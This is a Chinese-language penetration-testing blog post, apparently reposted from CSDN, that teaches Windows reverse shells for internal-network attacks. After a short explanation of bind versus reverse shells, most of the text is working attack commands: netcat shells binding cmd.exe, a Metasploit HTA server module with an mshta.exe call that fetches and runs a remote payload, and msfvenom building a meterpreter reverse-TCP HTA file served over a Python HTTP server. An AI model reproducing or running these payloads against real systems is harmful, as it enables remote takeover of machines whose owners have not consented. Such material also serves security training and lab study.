内网渗透之Windows反弹shell(一)

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

目录

反向shell简介

01什么是正向shell

02什么是反向shell

Windows反弹shell

01NC正向shell

01NC反向shell

02mshta.exe

通过Metasoloit的HTA Web Server模块发起HTA攻击

通过msfvenom生成恶意hta文件

内网渗透之Windows反弹shell(二)_不知名白帽的博客-CSDN博客

01什么是正向shell

正向shell:控制端主动发起亲贵去连接被控制端·中间网络链路不存在阻碍

img

02什么是反向shell

反向shell(反弹shell):被控端主动发起请求去连接控制端·通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接受发过来的数据包。

img

01NC正向shell

被控端:

nc -lvvp 6666 -e cmd.exe

img

控制端:

nc 192.168.0.105 6666

img

原理:

被控端将cmd.exe重定向到本地的6666端口·控制端主动连接被控端的6666端口·即可获得shell

01NC反向shell

控制端:

nc -lvvp 6666

img

被控端:

nc -e cmd.exe 192.168.0.104 6666

img

再查看控制端

img

原理:

被控端将cmd.exe重定向到控制端6666端口·控制端只需要监听本地的6666端口·即可获得shell

02mshta.exe

mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件

通过Metasoloit的HTA Web Server模块发起HTA攻击

use exploit/windows/misc/hta_server

set srvhost 192.168.0.104

exploit -j

img

mshta.exe http://192.168.0.104:8080/SxUxU5AvkuW2LCX.hta

img

反弹成功

img

通过msfvenom生成恶意hta文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f hta-psh -o 222.hta

img

开启监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.0.104 -P 4444

img

开启一个http服务,用于被控制端下载执行hta文件

python3 -m http.server

img

  

被控端执行

img

查看http服务

img

反弹成功

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125681307
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复